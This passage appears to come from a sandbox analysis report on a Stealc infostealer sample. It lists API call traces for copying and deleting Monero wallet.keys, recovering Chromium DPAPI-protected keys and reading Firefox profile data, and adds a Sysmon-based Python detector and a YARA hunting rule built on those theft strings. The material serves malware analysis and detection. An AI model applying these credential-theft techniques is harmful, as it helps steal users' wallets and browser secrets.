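            # CopyFileA's destination shows up as a file-create by the copying process.
            if (PureWindowsPath(target).name.lower() == "wallet.keys"
                    and not _matches(image, WALLET_OWNER_GLOBS)):
                staged[e["ProcessId"]].add(target.lower())
        elif eid in FILE_DELETE:
            target = e["TargetFilename"]
            # DeleteFileA of a copy the same process made: stage-read-delete pattern.
            if target.lower() in staged[e["ProcessId"]]:
                findings.append(("wallet_keys_staged_then_deleted", image, target))
                staged[e["ProcessId"]].discard(target.lower())
    return findings


# Constructed sample events, not taken from the report or any real host.
SAMPLE_EVENTS = [
    {"EventID": 7, "ProcessId": 4312, "Image": r"C:\Users\user\Desktop\file.exe",
     "ImageLoaded": r"C:\ProgramData\chrome.dll"},
    {"EventID": 7, "ProcessId": 5100,
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ImageLoaded": r"C:\Program Files\Google\Chrome\Application\129.0.0.0\chrome.dll"},
    {"EventID": 11, "ProcessId": 4312, "Image": r"C:\Users\user\Desktop\file.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\wallet.keys"},
    {"EventID": 23, "ProcessId": 4312, "Image": r"C:\Users\user\Desktop\file.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\wallet.keys"},
    {"EventID": 11, "ProcessId": 6020,
     "Image": r"C:\Program Files\Monero GUI Wallet\monero-wallet-gui.exe",
     "TargetFilename": r"C:\Users\user\Documents\Monero\wallets\main\wallet.keys"},
]

if __name__ == "__main__":
    for rule, image, path in detect(SAMPLE_EVENTS):
        print(f"{rule}: {image} -> {path}")
```

The second rule deliberately keys on the process that created the copy and then deleted it, rather than on any access to wallet.keys, so the wallet application's own writes do not fire it; a stealer that reads the original in place without copying would need a separate file-read rule.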
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 00038CF0: GetSystemTime.KERNEL32(00040E1B,00FDA5D0,000405B6,?,?,000213F9,?,0000001A,00040E1B,00000000,?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 00038D16
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0002D581
                          • lstrlen.KERNEL32(00000000), ref: 0002D798
                          • lstrlen.KERNEL32(00000000), ref: 0002D7AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0002D82B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: adef66ba08337dcaa9935869bef51d2d79a73e5622ea38b842760bd7024d401f
                          • Instruction ID: 4c23308526c95f283faa767b032023d3e286cd07e48d387e211abd7af9951316
                          • Opcode Fuzzy Hash: adef66ba08337dcaa9935869bef51d2d79a73e5622ea38b842760bd7024d401f
                          • Instruction Fuzzy Hash: 7C91F272A101189BCB05FBA4ECA6EEEB33DAF15300F504569F15766093EF306A48CB66
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 00038CF0: GetSystemTime.KERNEL32(00040E1B,00FDA5D0,000405B6,?,?,000213F9,?,0000001A,00040E1B,00000000,?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 00038D16
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0002D901
                          • lstrlen.KERNEL32(00000000), ref: 0002DA9F
                          • lstrlen.KERNEL32(00000000), ref: 0002DAB3
                          • DeleteFileA.KERNEL32(00000000), ref: 0002DB32
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: b0b104033c1ea0605a949b66932dfac66295749cd9997c4e5ee9e44bbe23d4c2
                          • Instruction ID: 6987a6248ac07af5dba19a938cf151e96d0c675a48c72d7252e5de1b2fa737a9
                          • Opcode Fuzzy Hash: b0b104033c1ea0605a949b66932dfac66295749cd9997c4e5ee9e44bbe23d4c2
                          • Instruction Fuzzy Hash: 0581F072A101189BCB05FBA4ECA6EEEB33DAF55300F404569F55766093EF346A08CB76
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          • API ID: AdjustPointer
                          • String ID:
                          • API String ID: 1740715915-0
                          • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                          • Instruction ID: f8255f2147562729de0d4da9053a9b3c5c8ccd4fe005310c32d0359df2101024
                          • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                          • Instruction Fuzzy Hash: 5E51B17260120AAFEF29CF64C851BBA77A4FF02310F24413DE905865A2E731ED50EB90
                          APIs
                          • LocalAlloc.KERNEL32(00000040,?), ref: 0002A664
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          • API ID: AllocLocallstrcpy
                          • String ID: @$v10$v20
                          • API String ID: 2746078483-278772428
                          • Opcode ID: 84190163a25ebfee19e75ca229a82246a180a66f9b8a1fe0d856046f40b62a9f
                          • Instruction ID: 55cd4eb31b4ef30964be2f087499606ef6ac234bec57c184ca0738609715253d
                          • Opcode Fuzzy Hash: 84190163a25ebfee19e75ca229a82246a180a66f9b8a1fe0d856046f40b62a9f
                          • Instruction Fuzzy Hash: 39515C70B10218EFDB24DFA4DD95FEDB77AAF41304F008018E94A6F292DB706A05CB56
                          APIs
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 0002A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0002A13C
                            • Part of subcall function 0002A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0002A161
                            • Part of subcall function 0002A110: LocalAlloc.KERNEL32(00000040,?), ref: 0002A181
                            • Part of subcall function 0002A110: ReadFile.KERNEL32(000000FF,?,00000000,0002148F,00000000), ref: 0002A1AA
                            • Part of subcall function 0002A110: LocalFree.KERNEL32(0002148F), ref: 0002A1E0
                            • Part of subcall function 0002A110: CloseHandle.KERNEL32(000000FF), ref: 0002A1EA
                            • Part of subcall function 00038FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00038FE2
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00041678,00040D93), ref: 0002F64C
                          • lstrlen.KERNEL32(00000000), ref: 0002F66B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: fccb7b1e0ffeff93765f3ad98dbb0d4d4236460657f39f1182c02e8fd3839f4a
                          • Instruction ID: 1e2675ebd1ca6f97c254c0df3611249cc8d07b024e7e97969a647690b3384a03
                          • Opcode Fuzzy Hash: fccb7b1e0ffeff93765f3ad98dbb0d4d4236460657f39f1182c02e8fd3839f4a
                          • Instruction Fuzzy Hash: F851EC72E101089BCB05FBA4EDA6DEEB37DAF55300F408568F55667193EF346A08CB62
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 93e23c8788df97cc33d3a5976cfd8d8b35fe841bc3504f011e9080d22cc3553c
                          • Instruction ID: 957d7b09b8a5db61c1569fe44b3aa5bae57736b637a06de016e14f25b400414c
                          • Opcode Fuzzy Hash: 93e23c8788df97cc33d3a5976cfd8d8b35fe841bc3504f011e9080d22cc3553c
                          • Instruction Fuzzy Hash: DA4131B1E10209DBDB05EFA4D895AFEB77CAF55304F008029F51677191EB74AA04CFA6
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0002A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0002A13C
                            • Part of subcall function 0002A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0002A161
                            • Part of subcall function 0002A110: LocalAlloc.KERNEL32(00000040,?), ref: 0002A181
                            • Part of subcall function 0002A110: ReadFile.KERNEL32(000000FF,?,00000000,0002148F,00000000), ref: 0002A1AA
                            • Part of subcall function 0002A110: LocalFree.KERNEL32(0002148F), ref: 0002A1E0
                            • Part of subcall function 0002A110: CloseHandle.KERNEL32(000000FF), ref: 0002A1EA
                            • Part of subcall function 00038FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00038FE2
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0002A489
                            • Part of subcall function 0002A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00024F3E,00000000,00000000), ref: 0002A23F
                            • Part of subcall function 0002A210: LocalAlloc.KERNEL32(00000040,?,?,?,00024F3E,00000000,?), ref: 0002A251
                            • Part of subcall function 0002A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00024F3E,00000000,00000000), ref: 0002A27A
                            • Part of subcall function 0002A210: LocalFree.KERNEL32(?,?,?,?,00024F3E,00000000,?), ref: 0002A28F
                            • Part of subcall function 0002A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0002A2D4
                            • Part of subcall function 0002A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0002A2F3
                            • Part of subcall function 0002A2B0: LocalFree.KERNEL32(?), ref: 0002A323
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: a34471ccc90ede56cde3eede01e33725d79b4bcca1b2f741a4d077d76fe35a4e
                          • Instruction ID: b292a86e038cfbc4dbe5295969030e824512ea89e1170b9ace4c7d6bcd911be4
                          • Opcode Fuzzy Hash: a34471ccc90ede56cde3eede01e33725d79b4bcca1b2f741a4d077d76fe35a4e
                          • Instruction Fuzzy Hash: 663164B6E00619ABCF04DFD4ED45AEFB7B8BF59344F444558E905A7242EB309E04CBA2
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,000405BF), ref: 0003885A
                          • Process32First.KERNEL32(?,00000128), ref: 0003886E
                          • Process32Next.KERNEL32(?,00000128), ref: 00038883
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • CloseHandle.KERNEL32(?), ref: 000388F1
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 88a726e3d89f16807c233360b004e886b49388ccf9fe44ceeaacad0d7db00f05
                          • Instruction ID: cb89a5ce80b57f22168e282cf4053ae7387a9f949c383c5ec44f66ba67094183
                          • Opcode Fuzzy Hash: 88a726e3d89f16807c233360b004e886b49388ccf9fe44ceeaacad0d7db00f05
                          • Instruction Fuzzy Hash: 9F315971A01218ABCB26DF95DC55FEEB37CEB06700F1041E9F10EA61A1DB306A44CFA1
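The function blocks above surface a small set of plaintext artefacts once the sample has decrypted its strings: the Chromium `"encrypted_key":"` marker and `DPAPI` tag, the `\Monero\wallet.keys` path, the Firefox origin-attribute suffix `^userContextId=4294967295` with `moz-extension`, and the Toolhelp32 process walk. The rule below is an added hunting rule written for this page, not one shipped by Joe Sandbox or taken from any vendor; the rule name and thresholds are this example's own choices. Because the report notes that the binary decrypts its strings at runtime and resolves APIs through GetProcAddress, these strings are not expected in the packed file on disk: scan unpacked dumps or live process memory, and treat a hit as a lead for manual confirmation, since `DPAPI` and `encrypted_key` alone also appear in legitimate credential-management tooling.

```yaml
// Added hunting rule for memory dumps / unpacked images of this sample family.
// Not a vendor rule; strings are taken from the decrypted code regions listed above.
rule stealc_browser_wallet_theft_strings_memory
{
    meta:
        description = "Chromium key recovery, Firefox profile and Monero wallet strings seen in decrypted Stealc memory"
        scope       = "process memory or unpacked dumps only; on-disk sample keeps these strings encrypted"
    strings:
        $s_chrome_key = "\"encrypted_key\":\"" ascii
        $s_dpapi      = "DPAPI" ascii
        $s_monero     = "\\Monero\\wallet.keys" ascii
        $s_moz_ext    = "moz-extension" ascii
        $s_moz_ctx    = "^userContextId=4294967295" ascii
        $a_unprotect  = "CryptUnprotectData" ascii
        $a_b64        = "CryptStringToBinaryA" ascii
        $a_snapshot   = "CreateToolhelp32Snapshot" ascii
    condition:
        3 of ($s_*) and 2 of ($a_*)
}
```

The `$a_*` names are matched as plain strings rather than through the `pe` import table on purpose: dynamically resolved APIs never appear in the import directory, but the names the sample passes to GetProcAddress do sit in memory once decrypted. No MZ-header check is used for the same reason; a dumped region need not start at the image base.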
                          APIs
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0009FE13
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0009FE2C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Value___vcrt_
                          • String ID:
                          • API String ID: 1426506684-0
                          • Opcode ID: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                          • Instruction ID: e2c1acad3b99349845afdf79d926a9fc4c1099218b86888c18db8b087424bc6c
                          • Opcode Fuzzy Hash: 78a688fa4b1a268c6419ddf2d244e6a3897435511f5bfa7c2bb3e66ac9c61958
                          • Instruction Fuzzy Hash: EB017C32209762AEFE7526B45CC9EFA3694EB027B5B34433AF616C51F3EF914C41A140
                          APIs
                          • CreateFileA.KERNEL32(00033D3E,80000000,00000003,00000000,00000003,00000080,00000000,?,00033D3E,?), ref: 0003948C
                          • GetFileSizeEx.KERNEL32(000000FF,00033D3E), ref: 000394A9
                          • CloseHandle.KERNEL32(000000FF), ref: 000394B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: 3bdd07a98202b780da56a46f2a5d71585ab36c7d3501035ef623ef06bc98e5b9
                          • Instruction ID: 920c10f47ece3fcfb5a28f4eb144232cf755be6b8a7706c3a7c69c49d3c08f04
                          • Opcode Fuzzy Hash: 3bdd07a98202b780da56a46f2a5d71585ab36c7d3501035ef623ef06bc98e5b9
                          • Instruction Fuzzy Hash: 60F0FF39E54208BBDB10DFB4EC49FAF77B9AB48711F10C664FA15A7280E6B49605DF80
                          APIs
                          • __getptd.LIBCMT ref: 0003CA7E
                            • Part of subcall function 0003C2A0: __amsg_exit.LIBCMT ref: 0003C2B0
                          • __getptd.LIBCMT ref: 0003CA95
                          • __amsg_exit.LIBCMT ref: 0003CAA3
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0003CAC7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 3c5603587793b1f6e4e74743477838b0e5f96ac2e22e902924320a8052bfad4e
